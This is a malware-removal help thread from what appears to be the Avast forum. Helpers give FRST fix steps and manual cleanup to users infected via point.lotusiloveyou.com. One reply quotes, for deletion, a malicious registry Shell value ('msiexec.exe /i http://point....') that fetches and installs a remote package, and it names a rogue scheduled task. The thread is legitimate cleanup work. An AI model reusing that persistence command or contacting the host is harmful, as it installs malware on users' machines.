Author Topic: URL:Mal with http://point.lotusiloveyou.com  (Read 2342 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
URL:Mal with http://point.lotusiloveyou.com
« on: April 16, 2017, 11:22:07 AM »
Everything seems fine now. Thank you  :D
« Last Edit: April 17, 2017, 07:26:37 AM by m4rc0staind »

Offline dbrisendine

  • Malware Fighter
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1258
Re: URL:Mal with http://point.lotusiloveyou.com
« Reply #1 on: April 17, 2017, 05:19:59 AM »

Fix with Farbar Recovery Scan Tool
This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.
Download attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please attach it to your reply.

How is your system running now?
Win7 x32 Ult. SP1, Brain 2.0 / Win10 x64, Brain2.5
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

REDACTED

  • Guest
Re: URL:Mal with http://point.lotusiloveyou.com
« Reply #2 on: June 05, 2017, 02:10:19 AM »
Can you help me too, please?


Fix with Farbar Recovery Scan Tool
This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.
Download attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please attach it to your reply.

How is your system running now?

Offline Eddy

  • Avast Evangelist
  • Maybe Bot
  • ***
  • Posts: 31078
  • Watching (over?) you
    • Malware removal, Biljart and other things.
Re: URL:Mal with http://point.lotusiloveyou.com
« Reply #3 on: June 05, 2017, 02:15:15 AM »
The log from MBam is missing.

Offline dbrisendine

  • Malware Fighter
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1258
Re: URL:Mal with http://point.lotusiloveyou.com
« Reply #4 on: June 05, 2017, 03:00:37 AM »
Bruna51,

There is a malicious entry in your registry. Open regedit (press the Win key + the R key, then type regedit and press Enter), navigate to Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies and there should be an entry named "Shell" with value "explorer.exe,msiexec.exe /i http://point....". Delete it.

Then run (via Win+R dialog) control schedtasks. Select "Task Scheduler Library" in the left panel. In the list in the middle select "PowerWord-SCT-JT" task and delete it.

Then reboot your computer.

Let me know if it worked.

« Last Edit: June 05, 2017, 03:05:56 AM by dbrisendine »
Win7 x32 Ult. SP1, Brain 2.0 / Win10 x64, Brain2.5
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

REDACTED

  • Guest
Re: URL:Mal with http://point.lotusiloveyou.com
« Reply #5 on: June 05, 2017, 03:22:35 AM »
The log from MBam is missing.

Here it goes